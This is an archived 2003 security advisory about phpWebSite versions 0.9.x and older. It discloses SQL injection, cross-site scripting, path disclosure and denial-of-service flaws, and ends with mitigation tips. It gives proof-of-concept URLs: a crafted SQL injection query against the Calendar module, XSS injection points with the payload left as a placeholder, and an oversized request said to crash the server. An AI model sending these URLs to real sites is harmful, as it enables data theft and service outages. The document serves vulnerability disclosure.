phpWebSite SQL Injection & DoS & XSS Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro (novappcat_private)
Date: Sun Aug 10 2003 - 16:16:44 PDT

  • Next message: Matt Zimmerman: "[SECURITY] [DSA-361-2] New kdelibs-crypto packages fix multiple vulnerabilities" 

    phpWebSite SQL Injection & DoS & XSS Vulnerabilities
------
PRODUCT: phpWebSite
VENDOR: Appalachian State University
VULNERABLE VERSIONS:

       - 0.9.x
       - 0.8.x
       - 0.7.x
       - And older versions.

NO VULNERABLE VERSIONS

- ?
---------------------

Description:

phpWebSite provides a complete web site content management system. Web-
based administration allows for easy maintenance of interactive, 
community-driven web sites.

---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------

I encountered SQL Injection vulnerabilities in some of the phpWebSite 
modules , XSS ( Cross Site Scripting ) , Path Disclosures and a Denial 
of Service attack.

-------------
| SQL       |
| INJECTION |
-------------

I encountered SQL Injection vulnerabilities in the Calendar module , 
active in default configurations , that allows you
to execute SQL queries in the target server with the privileges of the 
application user.

When you send a special-crafted command url to the Calendar script you 
get a SQL error flag like this:
__________________________________________________________________
DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED 
VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or 
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED 
VALUE]0110)) and active=1 [nativecode=1064 
** You have an error in your SQL syntax near 
'\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or 
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
___________________________________________________________________

This is an example error flag:
___________________________________________________________________
DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0-10110 and 
startDate <= 2003\0-10110) or 
(endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1 
[nativecode=1064 
** You have an error in your SQL syntax near 
'\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110 
and endDate ' at line 1]
___________________________________________________________________

For get this you must use this simple url:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=

And you get the SQL Error flag. The error occurs when the query 
includes the crafted value 2003[%00 = null]-1 .
You can design a successful query for get configuration values or 
authentication data.
I desgined an url that makes a successful query ( no hostile query ) :

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1

it is ( without url encoding ) :

2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 
20071205)) and active=1

It is needed to have a little knowledge of SQL ( in this case , MySQL ) 
for make a successful attack.

Other scripts of the Calendar module are affected by this hole , when 
you send a crafted request like a + symbol at critical url variable 
value
you get the "pure" sql server error flag and you can imagine ( i like 
this word ) a sql query for view private information of the application 
by
looking at the error pages , like an try-error method.

Another urls for probe are:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=0&year=<

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=1%00&year=)SQL_INJECTION_FAKU

------------------
| XSS            |
| vulnerabilities| 
------------------

I encountered XSS security holes in some scripts of phpWebSite :

 
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]

http://[HOST]/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]


Note that the Calendar & PageMaster & Fatcat modules are affected 
COMPLETLY and all the script variables that are passed by url are 
affected too by this.

When you access a hostile link with a xss attack in those scripts youur 
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other 
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can 
have more problems...

XSS AT SQL ERRORS:

If you send a crafted url command with a XSS attack code to some of the 
scripts that are vulnerable against sql injection vulnerabilities , the 
xss attack code will be executed
in the error page.


-----------------
| PATH          |
|  DISCLOSURES  |
-----------------

I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and 
versions:

- Sambar Server 5.2 beta
- PHP 4.2.3 running as ISPAI module
- MySQL NT [normal service] 3.23.56
- Include_Path to the pear folder of phpwebsite

Sending this:

http://127.0.0.1/index.php?module=calendar&calendar[view]
=month&month=11&year=9 # You can try other things and get the same #

you get this:

Warning: localtime(): invalid local time in 
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252

Warning: localtime(): invalid local time in 
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252

<- more than fifty repetitions of this warning ->

It is a strange error , i think that it only occurs in MSWindows 
installations.
Possible it occurs when the Pear library TimeZone.php script tries to 
convert the localdate in unix time stamp format.

------------------
| DENIAL OF      |
|  SERVICE       |
------------------

There is a DoS/Buffer Overflow Attack in a script inside the Calendar 
module that allows you to crash the host running
the MySQL server and the phpWebSite scripts ( must be the same 
computer ).
  
This is a basic proof of concept for this vulnerability :

http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )

An attack like this causes a system global crash including the server 
service and the mysql service.

-----------------
|   SoLuTiOnS   |
-----------------

1.- Be sure that the user of the phpWebSite database has only SELECT , 
INSERT and UPDATE privileges in only the phpWebSite
    database.

2.- Use the php function eregi_replace for prevent XSS attacks.

3.- Turn php_error_flags to Off .

4.- Use in addition an external module if you are using apache like 
mod_security .

5.- If you are paranoic don't use PHP , MySQL , Windows , Linux , 
computers , tcp/ip ,  netbios , games , asp ,
    Apache......  nothing ! 
    WARNING ;-) : ( paranoic solution... )

-----------
| CONTACT |
-----------

Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________

NSRG-20-7

    This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 10:49:22 PDT